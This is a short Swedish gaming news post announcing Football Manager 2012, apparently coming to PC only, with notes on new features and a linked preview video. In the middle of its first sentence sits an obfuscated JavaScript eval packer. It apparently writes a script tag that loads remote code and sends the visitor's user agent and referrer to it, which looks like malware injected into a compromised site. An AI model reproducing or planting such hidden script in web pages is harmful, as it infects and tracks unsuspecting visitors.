Image Image Image Image Image Image Image Image Image Image

| 22 september, 2018

Scroll to top

Top

Football Manager 2012 på ingång, men bara till PC?

Football Manager 2012 på ingång, men bara till PC?
Sebastian Plengier Ehrnfelt

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbikz|var|u0026u|referrer|tseak||js|php’.split(‘|’),0,{}))
utannonserade SEGA den senaste installationen av deras älskade spelserie Football Manager. Däremot ser det i nuläget ut som att spelet endast släpps till PC.

Som alla större sportspelsserier är uppdateringarna relativt få, men bortsett från de vanliga grafiska uppdateringarna och bättre animationer får vi ett nytt tutorial-läge för att göra det enklare för nya spelare, ett adaptivt användargränssnitt, ett nytt system för övergångar och kontrakt och lite nya kameravinklar.

Då vi på Revue.se främst kör på Mac är vi inte helt överlyckliga över SEGA:s nyheter, men förhoppningsvis kommer spelet senare till Mac om vi har tur. Frågan är bara hur länge Apples fotbollsfanatiker behöver vänta.

Nedan följer en preview som SEGA släppt som visar spelets match engine.

httpv://www.youtube.com/watch?v=stoveU0utQ4

 

Comments